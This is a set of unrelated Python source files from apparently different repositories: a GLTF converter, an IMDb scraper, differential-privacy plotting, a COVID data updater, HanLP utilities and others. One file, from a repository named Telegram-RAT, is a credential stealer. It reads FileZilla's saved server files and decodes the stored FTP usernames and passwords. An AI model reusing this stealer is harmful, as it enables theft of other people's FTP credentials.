raise Exception('Unsupported primitive mode for GLTF file "' + path + '".')
meshes.append(mesh)
except (TypeError, ValueError):
raise Exception(
'Mesh primitives must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Mesh primitives doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
meshIndex += 1
except (TypeError, ValueError):
raise Exception('Meshes must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Mesh doesn\'t contain element "' + str(e) + '" for GLTF file "' +
path + '".')
except (TypeError, ValueError):
raise Exception('Root value in GLTF file "' + path + '" must be an object.')
except KeyError as e:
raise Exception('GLTF file "' + path + '" doesn\'t contain element "' + str(e) + '".')
    # Convert meshes to geometry list. GLTF uses separate vertex streams rather than interleaved
    # vertices, so the index buffer will need to be separate for each. This will have some
    # data duplication during processing, but isn't expected to be a large amount in practice.
geometry = []
for mesh in meshes:
if mesh.indices:
indexData = mesh.indices.bufferView.buffer
if mesh.indices.type == 'X16':
indexSize = 2
elif mesh.indices.type == 'X32':
indexSize = 4
else:
raise Exception('Unsupported index type "' + mesh.indices.type +
'" for GLTF file "' + path + '".')
else:
indexData = None
indexSize = 0
vertexStreams = []
for attrib, accessor in mesh.attributes:
vertexFormat = [(attrib, accessor.type, accessor.decorator)]
vertexStreams.append(ModelNodeVertexStream(vertexFormat, accessor.bufferView.buffer,
indexSize, indexData))
geometry.append(ModelNodeGeometryData(mesh.name, vertexStreams, mesh.primitiveType))
return geometry
def registerGLTFModelType(convertContext):
"""
Registers the GLTF model type under the name "gltf".
"""
addModelType(convertContext, 'gltf', convertGLTFModel)
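
# Minimal usage sketch (illustrative only; assumes a ConvertContext from the
# DeepSea scene conversion tooling and a local "model.gltf" file):
#
#     registerGLTFModelType(convertContext)
#     geometry = convertGLTFModel(convertContext, 'model.gltf')
#     for geom in geometry:  # attribute names follow the constructor arguments
#         print(geom.name, geom.primitiveType)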
| 1.304688 | 1 |
book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | 0 | 32260 | <gh_stars>0
from bs4 import BeautifulSoup
from selenium import webdriver
import requests
import time
class Film(object):
"""docstring for film"""
def __init__(self):
self.title = ""
self.rank = ""
self.year_of_production = ""
self.link = ""
def create_phantom_driver():
driver = webdriver.PhantomJS(executable_path = r'C:\phantomjs-2.1.1-windows\bin\phantomjs.exe')
return driver
def get_popular_film_list(url):
driver = create_phantom_driver()
# url = 'http://www.imdb.com/chart/top?ref_=nv_mv_250_6'
# download html
driver.get(url)
# print driver.page_source
# create soup
soup = BeautifulSoup(driver.page_source,'lxml')
# soup = BeautifulSoup(open('imdb.html'),'lxml')
# search
table = soup.find('table',class_='chart')
film_list =[]
for td in table.find_all('td',class_='titleColumn'):
a = td.find('a')
# print a['href']
new_film = Film()
full_des = td.text.strip().replace('\n','')
# print full_des
title = full_des.split('(')[0]
# print title
year = full_des.split('(')[1][:4]
# print year
start_rank = full_des.find(')')
end_rank = full_des.find('(',start_rank,len(full_des))
rank = full_des[start_rank+1:end_rank]
# print rank
new_film.rank = rank
new_film.title = title
new_film.year_of_production = year
new_film.link = a['href'].strip()
film_list.append(new_film)
driver.quit()
for film in film_list:
print film.title
print film.rank
print film.year_of_production
print film.link
print "\n"
return film_list
# when ever we have the film list
def poster_scrap(film_list):
driver = create_phantom_driver()
for film in film_list:
url = 'http://www.imdb.com' + film.link
print film.title
driver.get(url)
soup = BeautifulSoup(driver.page_source, 'lxml')
div = soup.find('div', class_='poster')
# find the link lead to poster image
a = div.find('a')
# link to download poster image
poster_url = 'http://www.imdb.com' + a['href']
print poster_url
driver.get(poster_url)
soup = BeautifulSoup(driver.page_source, 'lxml')
# print soup.prettify()
divs = soup.find_all('div',class_='pswp__zoom-wrap')
try:
imgs = divs[1].find_all('img')
download_link = imgs[1]['src']
print download_link
except Exception, e:
imgs = divs[0].find_all('img')
download_link = imgs[1]['src']
print download_link
f = open('{0}.jpg'.format(film.title.encode('utf8').replace(':','')),'wb')
f.write(requests.get(download_link).content)
# time.sleep(2)
f.close()
driver.quit()
# url for current popular and hot film
url = 'http://www.imdb.com/chart/moviemeter/?ref_=nv_mv_mpm_7'
# get_popular_film_list(url)
poster_scrap(get_popular_film_list(url))
| 1.90625 | 2 |
Libraries_Benchmark/Real_dataset_experiments/code/Plotting/plots_code_real_dataset_var.py | gonzalo-munillag/Benchmarking_Differential_Privacy_Analytics_Libraries | 0 | 32388 | import matplotlib.pyplot as plt
import matplotlib.gridspec as gs
import numpy as np
import pandas as pd
import csv
from matplotlib.lines import Line2D
epsilon = pd.read_pickle('epsilon.pkl')
def plots_with_sizes(result_folder, query, attribute):
if attribute == 'age':
d = 1
if attribute == 'hrs':
d = 2
if attribute == 'absences':
d = 3
if attribute == 'grade':
d = 4
################# Std of scaled error ######################
diffprivlib_std = pd.read_csv(result_folder + "\\diffprivlib\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
smartnoise_std = pd.read_csv(result_folder + "\\smartnoise\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
pydp_std = pd.read_csv(result_folder + "\\pydp\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
diffpriv_std = pd.read_csv(result_folder + "\\diffpriv_simple\\{q}\\results_dataset_{d}\\std_scaled_error\\std_scaled_error.csv".format(q=query,d=d), header=None)
#chorus_std = pd.read_csv(result_folder + "\\chorus_real_dataset_results\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
################# Mean relative error ######################
diffprivlib_relative = pd.read_csv(result_folder + "\\diffprivlib\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
smartnoise_relative = pd.read_csv(result_folder + "\\smartnoise\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
pydp_relative = pd.read_csv(result_folder + "\\pydp\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
diffpriv_relative = pd.read_csv(result_folder + "\\diffpriv_simple\\{q}\\results_dataset_{d}\\mean_relative_error\\mean_relative_error.csv".format(q=query,d=d), header=None)
#chorus_relative = pd.read_csv(result_folder + "\\chorus_real_dataset_results\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
    ################ labels ######################
    # x1/x2 are zero everywhere except at the decade epsilon values; on the
    # log-scaled x-axes the zero-valued points are dropped, so the circular
    # markers only appear at epsilon = 0.01, 0.1, 1, 10 and 100.
    x1 = [0.01,0,0,0,0,0,0,0,0, 0.1 ,0,0,0,0,0, 0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0, 0,0, 0,0, 1, 0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,100]
    x2 = [0.01,0,0,0,0,0,0,0,0, 0.1 ,0,0,0,0,0, 0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0, 0,0, 0,0, 1, 0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,100]
################ Plotting ######################
gs1 = gs.GridSpec(nrows=1, ncols=2)
gs1.update(wspace=0.3, hspace=0.05) # set the spacing between axes.
figure = plt.gcf() # get current figure
figure.clf()
###### Size plot #######
ax1 = plt.subplot(gs1[0,0])
ax1.plot(x1, diffprivlib_std, "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, diffprivlib_std, color = 'xkcd:orangish red')
ax1.plot(x1, smartnoise_std[1:], "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, smartnoise_std[1:], color = 'xkcd:moss green')
ax1.plot(x1, pydp_std, "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, pydp_std, color = 'xkcd:soft blue')
ax1.plot(x1, diffpriv_std, "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, diffpriv_std, color = 'xkcd:aquamarine')
#ax1.plot(x1, chorus_std, "o", markeredgecolor='k', mfc='none')
#ax1.plot(epsilon, chorus_std, color = 'xkcd:purple')
ax1.set_xlabel('ε', fontsize = 12)
ax1.set_ylabel('Sample Std of the \n Absolute Scaled Error', fontsize = 16)
################# MEAN RELATIVE ERROR ############################
ax2 = plt.subplot(gs1[0,1])
ax2.plot(x2, abs(diffprivlib_relative)*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(diffprivlib_relative)*100, color = 'xkcd:orangish red', label="diffprivlib, IBM (Python)")
ax2.plot(x2, abs(smartnoise_relative[1:])*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(smartnoise_relative[1:])*100, color = 'xkcd:moss green', label="SmartNoise, Microsoft (Python wrapper over Rust)")
ax2.plot(x2, abs(pydp_relative)*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(pydp_relative)*100, color = 'xkcd:soft blue', label="PyDP (Python wrapper over Google DP C++)")
ax2.plot(x2, abs(diffpriv_relative)*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(diffpriv_relative)*100, color = 'xkcd:aquamarine', label="diffpriv, <NAME>, et al. (R)")
#ax2.plot(x2, abs(chorus_relative)*100, "o", markeredgecolor='k', mfc='none')
#ax2.plot(epsilon, abs(chorus_relative)*100, color = 'xkcd:purple', label="<NAME>ear et al (Scala)")
ax2.set_xlabel('ε', fontsize = 12)
ax2.set_ylabel('Sample Mean of the \n Relative Error [%]', fontsize = 16)
#ax1.legend(prop={'size': 19}, loc="lower center", bbox_to_anchor=(1.00, -0.02), frameon=False, ncol=4, handletextpad=0.2, handlelength=1, columnspacing=0.5)
#ax2.legend(prop={'size': 18}, loc="lower center", bbox_to_anchor=(-0.13, -0.30), frameon=False, ncol=2, handletextpad=0.2, handlelength=1, columnspacing=0.5)
figure.subplots_adjust(bottom=0.30)
#legend_elements_1 = [Line2D([1], [1], color='xkcd:orangish red', label='diffprivlib, IBM (Python)'), Line2D([1], [1], color='xkcd:soft blue', label='PyDP (Python wrapper over Google DP C++)'), Line2D([1], [1], color='xkcd:moss green', label='SmartNoise, Microsoft (Python wrapper over Rust)')]
#figure.legend(prop={'size': 18.5},handles=legend_elements_1, loc="lower center", bbox_to_anchor=(0.33, -0.02), frameon=False, ncol=1, handletextpad=0.2, handlelength=1)
#legend_elements_2 = [ Line2D([1], [1], color='xkcd:aquamarine', label='diffpriv, <NAME>, et al. (R)'), Line2D([1], [1], color='xkcd:purple', label='<NAME>ear et al (Scala)')]
#legend_elements_2 = [ Line2D([1], [1], color='xkcd:aquamarine', label='diffpriv, <NAME>, et al. (R)')]
#figure.legend(prop={'size': 18.5},handles=legend_elements_2, loc="lower center", bbox_to_anchor=(0.77, 0.1), frameon=False, ncol=1, handletextpad=0.2, handlelength=1)
if query == 'count':
ax1.set_ylim(10**-8, 10**3)
figure.suptitle('Count Query', fontsize=19)
if query == 'sum':
ax1.set_ylim(10**-8, 10**8)
figure.suptitle('Sum Query', fontsize=19)
if query == 'mean':
ax1.set_ylim(10**-12, 10**2)
figure.suptitle('Mean Query', fontsize=19)
if query == 'var':
ax1.set_ylim(10**-8, 10**4)
figure.suptitle('Variance Query', fontsize=19)
ax1.tick_params(axis='both', which='major', labelsize=16)
ax2.tick_params(axis='both', which='major', labelsize=16)
ax1.loglog()
ax2.set_xscale('log')
plt.show()
plots_with_sizes(result_folder="E:\\MS_Thesis\\publication_stuff\\results_Jan_2021\\real_dataset_micro\\22April2021", query="var", attribute='grade') | 1.59375 | 2 |
Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 375 | 32516 | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
    if not os.path.exists(FileZilla):
        return []

    RecentServersPath = FileZilla + 'recentservers.xml'
    SiteManagerPath = FileZilla + 'sitemanager.xml'
    FoundServers = []

    # Read recent servers
    if os.path.exists(RecentServersPath):
        xmlDoc = minidom.parse(RecentServersPath)
        for Node in xmlDoc.getElementsByTagName('Server'):
            # FileZilla stores the password base64-encoded
            FoundServers.append({
                'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
                'Username': Node.getElementsByTagName('User')[0].firstChild.data,
                'Password': b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
            })

    # Read sitemanager
    if os.path.exists(SiteManagerPath):
        xmlDoc = minidom.parse(SiteManagerPath)
        for Node in xmlDoc.getElementsByTagName('Server'):
            FoundServers.append({
                'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
                'Username': Node.getElementsByTagName('User')[0].firstChild.data,
                'Password': b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
            })

    return FoundServers | 1.484375 | 1 |
covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 0 | 32644 | <reponame>gunnarsundberg/covid-tracker<filename>covid_data/daily_updates/update_outbreak.py
import os
import io
import math
import requests
from datetime import datetime, date, timedelta
import pandas as pd
from covid_data.models import State, County, Outbreak, OutbreakCumulative
from covid_data.utilities import get_datetime_from_str, api_request_from_str
# Some functions only work for specific region types (state, county etc) because the data sources used differ
"""
# Gets all state outbreak data and returns it as json object
def get_outbreak_data_by_state(outbreak_state):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code
print(outbreak_str)
return api_request_from_str(outbreak_str)
# Gets all outbreak data for a specific state on a specified date and returns it as a json object
def get_outbreak_data_by_state_and_date(outbreak_state, outbreak_date):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code + "&date=" + str(outbreak_date).replace("-","")
return api_request_from_str(outbreak_str)
"""
def update_state_outbreak():
state_outbreak_csv_url = "https://raw.githubusercontent.com/COVID19Tracking/covid-tracking-data/master/data/states_daily_4pm_et.csv"
state_outbreak_csv = requests.get(state_outbreak_csv_url).content
outbreak_data = pd.read_csv(io.StringIO(state_outbreak_csv.decode('utf-8')))
for index, row in outbreak_data.iterrows():
# If state is not a region we track, move to next iteration
try:
record_state = State.objects.get(code=row['state'])
        except State.DoesNotExist:
continue
record_date = get_datetime_from_str(str(row['date']))
# If cases are greater than 99, update or create outbreak record
if row['positive'] > 99:
daily_cases = row['positiveIncrease']
daily_total_tested = row['totalTestResultsIncrease']
daily_deaths = row['deathIncrease']
if not math.isnan(row['negativeIncrease']):
daily_negative_tests = row['negativeIncrease']
else:
daily_negative_tests = None
if not math.isnan(row['hospitalizedIncrease']):
daily_admitted_to_hospital = row['hospitalizedIncrease']
else:
daily_admitted_to_hospital = None
if not math.isnan(row['hospitalizedCurrently']):
daily_hospitalized = row['hospitalizedCurrently']
else:
daily_hospitalized = None
if not math.isnan(row['inIcuCurrently']):
daily_in_icu = row['inIcuCurrently']
else:
daily_in_icu = None
new_values = {'region': record_state, 'date': record_date, 'cases': daily_cases, 'negative_tests': daily_negative_tests, 'total_tested': daily_total_tested, 'deaths': daily_deaths, 'admitted_to_hospital': daily_admitted_to_hospital, 'hospitalized': daily_hospitalized, 'in_icu': daily_in_icu}
state_outbreak, created = Outbreak.objects.update_or_create(region=record_state, date=record_date, defaults=new_values)
state_outbreak.save()
cumulative_cases = row['positive']
cumulative_total_tested = row['totalTestResults']
if not math.isnan(row['negative']):
cumulative_negative_tests = row['negative']
else:
cumulative_negative_tests = None
if not math.isnan(row['death']):
cumulative_deaths = row['death']
else:
cumulative_deaths = None
if not math.isnan(row['hospitalizedCumulative']):
cumulative_hospitalized = row['hospitalizedCumulative']
else:
cumulative_hospitalized = None
if not math.isnan(row['inIcuCumulative']):
cumulative_in_icu = row['inIcuCumulative']
else:
cumulative_in_icu = None
state_outbreak_cumulative, created = OutbreakCumulative.objects.update_or_create(
region=record_state,
date=record_date,
defaults={
'cases': cumulative_cases,
'negative_tests': cumulative_negative_tests,
'total_tested': cumulative_total_tested,
'deaths': cumulative_deaths,
'hospitalized': cumulative_hospitalized,
'in_icu': cumulative_in_icu
}
)
state_outbreak_cumulative.save()
def update_all_state_outbreaks(date_to_update):
    # NOTE: this relies on get_outbreak_data_by_state_and_date() and the
    # json-based update_state_outbreak() helpers that are commented out in
    # the docstring block above, so it cannot run as-is.
states = State.objects.all()
for state in states:
outbreak_json = get_outbreak_data_by_state_and_date(state, date_to_update)
update_state_outbreak(outbreak_json)
def update_county_outbreak():
url = "https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv"
county_data = requests.get(url).content
county_data_dataframe = pd.read_csv(io.StringIO(county_data.decode('utf-8')), dtype={'fips': 'object'})
for index, row in county_data_dataframe.iterrows():
cases = row['cases']
if cases > 24:
record_date = datetime.strptime(row['date'], '%Y-%m-%d').date()
county_fips = str(row['fips'])
deaths = row['deaths']
try:
county = County.objects.get(fips_code=county_fips)
outbreak_cumulative_record, created = OutbreakCumulative.objects.update_or_create(
region=county,
date=record_date,
defaults={
'cases': cases,
'deaths': deaths
}
)
outbreak_cumulative_record.save()
except:
continue
try:
county = County.objects.get(fips_code=county_fips)
day_before = record_date - timedelta(days=1)
day_before_df = county_data_dataframe[(county_data_dataframe.fips == county_fips) & (county_data_dataframe.date == str(day_before))]
index = day_before_df.index[0]
cases = cases - day_before_df['cases'][index]
if cases < 0:
cases = 0
deaths = deaths - day_before_df['deaths'][index]
outbreak_record, created = Outbreak.objects.update_or_create(
region=county,
date=record_date,
defaults={
'cases': cases,
'deaths': deaths
}
)
except:
continue
| 1.820313 | 2 |
core/src/trezor/messages/TxAck.py | Kayuii/trezor-crypto | 0 | 32772 | <reponame>Kayuii/trezor-crypto
# Automatically generated by pb2py
# fmt: off
import protobuf as p
from .TransactionType import TransactionType
class TxAck(p.MessageType):
MESSAGE_WIRE_TYPE = 22
def __init__(
self,
tx: TransactionType = None,
) -> None:
self.tx = tx
@classmethod
def get_fields(cls):
return {
1: ('tx', TransactionType, 0),
}
| 1.164063 | 1 |
Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | 31 | 32900 | <reponame>MichaelRW/Python-for-Geeks<filename>Chapter11/grades_ms/grades/grades_svc/admin.py
from django.contrib import admin
from .models import Grade
admin.site.register(Grade)
| 0.921875 | 1 |
django_rest_auth_embedded/tests/__init__.py | Volkova-Natalia/django_rest_auth_embedded | 0 | 33028 | <reponame>Volkova-Natalia/django_rest_auth_embedded
from .models import *
from .urls import *
from .views import *
from .integration import *
| 0.5625 | 1 |
hanlp/utils/__init__.py | antfootAlex/HanLP | 27,208 | 33156 | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-08-24 22:12
from . import rules
def ls_resource_in_module(root) -> dict:
    """Recursively collect downloadable resource URLs declared in a module.

    Walks the attributes of ``root`` (and of any sub-modules), keeping string
    values that look like resource URLs, and mirrors the collected mapping
    into the module's ``ALL`` dict when one is present.
    """
res = dict()
for k, v in root.__dict__.items():
if k.startswith('_') or v == root:
continue
if isinstance(v, str):
if v.startswith('http') and not v.endswith('/') and not v.endswith('#') and not v.startswith('_'):
res[k] = v
elif type(v).__name__ == 'module':
res.update(ls_resource_in_module(v))
if 'ALL' in root.__dict__ and isinstance(root.__dict__['ALL'], dict):
root.__dict__['ALL'].update(res)
return res
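
# Usage sketch (hanlp.pretrained is the usual target module; illustrative):
#
#     from hanlp import pretrained
#     resources = ls_resource_in_module(pretrained)
#     for name, url in resources.items():
#         print(name, url)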
| 1.976563 | 2 |
examples/main_simulation_lemon_graph.py | KaterynaMelnyk/GraphKKE | 1 | 33284 | import os
import argparse
import numpy as np
import imageio
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
import graphkke.generate_graphs.graph_generation as graph_generation
import graphkke.generate_graphs.generate_SDE as generate_SDE
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', type=str,
default='/home/katerynam/work/data/artificial/test/')
parser.add_argument('--n_graphs', type=int,
default=500)
parser.add_argument('--n_nodes', type=int,
default=300)
parser.add_argument('--radius', type=float,
default=0.6)
parser.add_argument('--n_wells', type=int,
default=3)
parser.add_argument('--out_state', type=int,
default=0.1)
parser.add_argument('--if_plot', type=bool,
default=True)
parser.add_argument('--seed', type=int,
default=7)
args = parser.parse_args()
def randb(n, b):
    # scipy.rand was removed from modern SciPy; NumPy's RNG is equivalent here
    return b[0] + (b[1] - b[0]) * np.random.rand(1, n)
def rand(n, bounds, boxes):
d = boxes.size
x = np.zeros([d, n])
for i in range(d):
x[i, :] = randb(n, bounds[i, :])
return x
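
# Example: draw one 2D starting point uniformly from [-0.5, 0.5]^2,
# mirroring the call in __main__ below:
#
#     x0 = rand(1, np.asarray([[-0.5, 0.5], [-0.5, 0.5]]), np.asarray([10, 10]))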
if __name__ == '__main__':
lm = generate_SDE.LemonSlice2D([0.9, 0.9], args.n_graphs, 2, args.n_wells)
x = rand(1, np.asarray([[-0.5, 0.5], [-0.5, 0.5]]), np.asarray([10, 10]))
sde_traj = np.asarray(lm.sim_determ_system(x[:, 0]))
k_means = KMeans(n_clusters=args.n_wells).fit(sde_traj)
graph_states = k_means.labels_
# sde_traj = np.load(args.input_dir + 'traj.npy')
# graph_states = np.load(args.input_dir + 'graph_states.npy')
plt.scatter(sde_traj[:, 0], sde_traj[:, 1], c=graph_states)
plt.show()
sim_graph = graph_generation.LemonGraph(args.radius, args.n_graphs, args.n_nodes,
graph_states)
graphs, images, node_points = sim_graph.create_adj_matrix(sde_traj, args.out_state, args.if_plot)
for i, image in enumerate(images):
imageio.imwrite(args.input_dir + f'/traj_{i}.png', image)
imageio.mimsave(args.input_dir + '/anim.gif', images, fps=2)
np.save(os.path.join(args.input_dir + 'traj.npy'), sde_traj)
np.save(os.path.join(args.input_dir + 'graphs.npy'), graphs)
np.save(os.path.join(args.input_dir + 'graph_states.npy'), graph_states)
np.save(os.path.join(args.input_dir + 'node_points.npy'), node_points)
| 2.34375 | 2 |
MultiPManager/distProc.py | sebastiantrianac/SoftTLON | 0 | 33412 | <reponame>sebastiantrianac/SoftTLON
#!/usr/bin/env python
# coding=utf-8
#
# A module for creating a multi-agent system over ad-hoc networks
# Copyright (C) 2017-2018
# <NAME> <<EMAIL>>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
__author__ = "<NAME>"
__copyright__ = "Copyright 2015, TLON group"
__license__ = "LGPL"
__version__ = "1.2"
__email__ = "<EMAIL>"
__status__ = "Development"
import multiprocessing
from multiprocessing.managers import SyncManager
import sys
import stomp
import dill as pickle
import time
import MultiPManager.managerImp as managerImp
import MultiPManager.brokermq as brokermq
import MultiPManager.multiProc as multiProc
import socket
if sys.version_info[0]<3:
import Queue
else:
import queue
IP = '10.203.177.194'
MANAGER_PORTNUM = 9999
BROKER_PORTNUM = 61613
AUTHKEY = ''
global numresults
numresults=0
tlon_resources = {}
def updateResourceOnSuscribers(resource, conn):
msg = pickle.dumps(resource,0)
conn.send(destination='/topic/TLONResources', body=msg)
def updateOrderOnSuscribers(name, ip, portnum, authkey,conn):
tmp = {"resourceName": name, "ip": ip, "portnum": portnum, "authkey": authkey}
msg = pickle.dumps(tmp,0)
conn.send(destination='/topic/TLONOrders', body=msg)
def tlon_sharedJobs(f, dataset, chunkSize):
    manager = managerImp.make_server_manager(MANAGER_PORTNUM, AUTHKEY)
    shared_job_q = manager.get_job_q()
    shared_result_q = manager.get_result_q()

    # Split the work into fixed-size chunks and enqueue them for the workers
    for i in range(0, len(dataset), chunkSize):
        print('Putting chunk {}:{} in queue'.format(i, i + chunkSize))
        shared_job_q.put(dataset[i:i + chunkSize])
    return manager, shared_job_q, shared_result_q
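
# Worker-side sketch (illustrative): this mirrors what a consumer such as
# multiProc.tlon_multiprocessing is expected to do -- pull a chunk from the
# shared job queue, apply f, and push an {input: result} dict back:
#
#     while True:
#         chunk = shared_job_q.get()
#         shared_result_q.put({n: f(n) for n in chunk})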
def tlon_parallelize(ipbroker, f, dataset):
try:
resultdict = {}
N = 102
chunkSize = 10
conn = brokermq.BrokerConnect(ipbroker, BROKER_PORTNUM)
updateResourceOnSuscribers(f, conn)
        manager, shared_job_q, shared_result_q = tlon_sharedJobs(f, dataset, chunkSize)
time.sleep(2)
hostname = socket.gethostname()
ipsocket = socket.gethostbyname(hostname)
updateOrderOnSuscribers(f.__name__, ipsocket, MANAGER_PORTNUM, AUTHKEY, conn)
global numresults
numresults = 0
#if 1:
# multiProc.tlon_multiprocessing(shared_job_q, shared_result_q, f)
        while numresults < len(dataset):
outdict = shared_result_q.get()
#resultdict.update(outdict)
numresults += len(outdict)
#updateResourceOnSuscribers(f, conn)
#for num, result in outdict.iteritems():
#print("{}({}) = {}".format(f.__name__, num, result))
print ('End of Task')
except IOError as e:
print ("I/O error({0}): {1}".format(e.errno, e.strerror))
except ValueError:
print ("Could not convert data to an integer.")
finally:
time.sleep(2)
manager.shutdown()
def runclient(ipbroker, threads):
    # Set the number of threads that will handle processing requests
    # arriving from the network
    multiProc.setThreads(threads)
# Connecting to TLONResource Topic to receive shared resources
connResources = brokermq.BrokerConnect(ipbroker, BROKER_PORTNUM)
connResources.set_listener('ResourceTopic', brokermq.__resourceTopicListener__())
connResources.subscribe(destination='/topic/TLONResources', id=1, ack='auto')
# Connecting to TLONOrders Topic to start executed OoW
connOrders = brokermq.BrokerConnect(ipbroker, BROKER_PORTNUM)
connOrders.set_listener('OrdersTopic', brokermq.__ordersTopicListener__())
connOrders.subscribe(destination='/topic/TLONOrders', id=2, ack='auto')
if __name__ == '__main__':
    if len(sys.argv) > 1 and sys.argv[1] == 'producer':
        # NOTE: tlon_parallelize requires (ipbroker, f, dataset) arguments;
        # the caller must supply the broker IP, the work function and the data.
        tlon_parallelize()
else:
runclient('192.168.0.8', 2)
| 1.835938 | 2 |
Gather_Data.py | batumoglu/Home_Credit | 1 | 33540 | <filename>Gather_Data.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 28 19:51:12 2018
@author: ozkan
"""
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder  # required by AllData()
from scipy import stats
import gc
import GatherTables
def one_hot_encoder(df):
original_columns = list(df.columns)
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
df = pd.get_dummies(df, columns= categorical_columns, dummy_na= True)
new_columns = [c for c in df.columns if c not in original_columns]
return df, new_columns
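
# Example (hypothetical frame): object-typed columns are expanded into dummy
# indicator columns, including a *_nan column for missing values:
#
#     df = pd.DataFrame({'grade': ['a', 'b', None], 'x': [1, 2, 3]})
#     df, new_cols = one_hot_encoder(df)   # adds grade_a, grade_b, grade_nan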
def checkTrainTestConsistency(train, test):
    # Placeholder: no consistency checks are implemented yet
    return (train, test)
def AllData_v2(reduce_mem=True):
app_data, len_train = GatherTables.getAppData()
app_data = GatherTables.generateAppFeatures(app_data)
merged_df = GatherTables.handlePrev(app_data)
merged_df = GatherTables.handleCreditCard(merged_df)
merged_df = GatherTables.handleBuro(merged_df)
merged_df = GatherTables.handleBuroBalance(merged_df)
merged_df = GatherTables.handlePosCash(merged_df)
merged_df = GatherTables.handleInstallments(merged_df)
categorical_feats = [f for f in merged_df.columns if merged_df[f].dtype == 'object']
for f_ in categorical_feats:
merged_df[f_], indexer = pd.factorize(merged_df[f_])
merged_df.drop('SK_ID_CURR', axis=1, inplace=True)
data = merged_df[:len_train]
test = merged_df[len_train:]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y)
def AllData_v3(reduce_mem=True):
app_data, len_train = GatherTables.getAppData()
app_data = GatherTables.generateAppFeatures(app_data)
merged_df = GatherTables.handlePrev_v2(app_data)
merged_df = GatherTables.handleCreditCard_v2(merged_df)
merged_df = GatherTables.handleBuro_v2(merged_df)
merged_df = GatherTables.handleBuroBalance_v2(merged_df)
merged_df = GatherTables.handlePosCash_v2(merged_df)
merged_df = GatherTables.handleInstallments_v2(merged_df)
categorical_feats = [f for f in merged_df.columns if merged_df[f].dtype == 'object']
for f_ in categorical_feats:
merged_df[f_], indexer = pd.factorize(merged_df[f_])
merged_df.drop('SK_ID_CURR', axis=1, inplace=True)
data = merged_df[:len_train]
test = merged_df[len_train:]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y)
def AllData_v4(reduce_mem=True):
app_data, len_train = GatherTables.getAppData()
app_data = GatherTables.generateAppFeatures_v4(app_data)
merged_df = GatherTables.handlePrev_v4(app_data)
merged_df = GatherTables.handleCreditCard_v4(merged_df)
merged_df = GatherTables.handleBuro_v4(merged_df)
merged_df = GatherTables.handleBuroBalance_v2(merged_df)
merged_df = GatherTables.handlePosCash_v2(merged_df)
merged_df = GatherTables.handleInstallments_v2(merged_df)
merged_df,cat_cols = one_hot_encoder(merged_df)
merged_df.drop('SK_ID_CURR', axis=1, inplace=True)
data = merged_df[:len_train]
test = merged_df[len_train:]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y)
